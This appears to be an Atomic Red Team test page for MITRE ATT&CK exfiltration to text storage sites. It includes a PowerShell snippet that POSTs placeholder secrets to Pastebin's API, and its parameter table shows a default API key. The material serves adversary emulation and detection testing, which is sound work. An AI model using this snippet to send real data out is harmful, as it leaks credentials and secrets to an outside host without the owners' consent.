Adversaries may exfiltrate data to text storage sites instead of their primary command and control channel. Text storage sites, such as pastebin[.]com
, are commonly used by developers to share code and other information.
Text storage sites are often used to host malicious code for C2 communication (e.g., [Stage Capabilities](https://attack.mitre.org/techniques/T1608)), but adversaries may also use these sites to exfiltrate collected data. Furthermore, paid features and encryption options may allow adversaries to conceal and store data more securely.(Citation: Pastebin EchoSec)
**Note:** This is distinct from [Exfiltration to Code Repository](https://attack.mitre.org/techniques/T1567/001), which highlight access to code repositories via APIs.
This test uses HTTP POST to exfiltrate data to a remote text storage site. (pastebin)
See https://web.archive.org/web/20201107203304/https://www.echosec.net/blog/what-is-pastebin-and-why-do-hackers-love-it
Supported Platforms: Windows
auto_generated_guid: c2e8ab6e-431e-460a-a2aa-3bc6a32022e3
| Name | Description | Type | Default Value | |——|————-|——|—————| | api_key | Pastebin API key | string | 6nxrBm7UIJuaEuPOkH5Z8I7SvCLN3OP0|
1
powershell
!1
2
3
4
5
6
7
8
9
10
$apiKey = "#{api_key}"
$content = "secrets, api keys, passwords..."
$url = "https://pastebin.com/api/api_post.php"
$postData = @{
api_dev_key = $apiKey
api_option = "paste"
api_paste_code = $content
}
$response = Invoke-RestMethod -Uri $url -Method Post -Body $postData
Write-Host "Your paste URL: $response"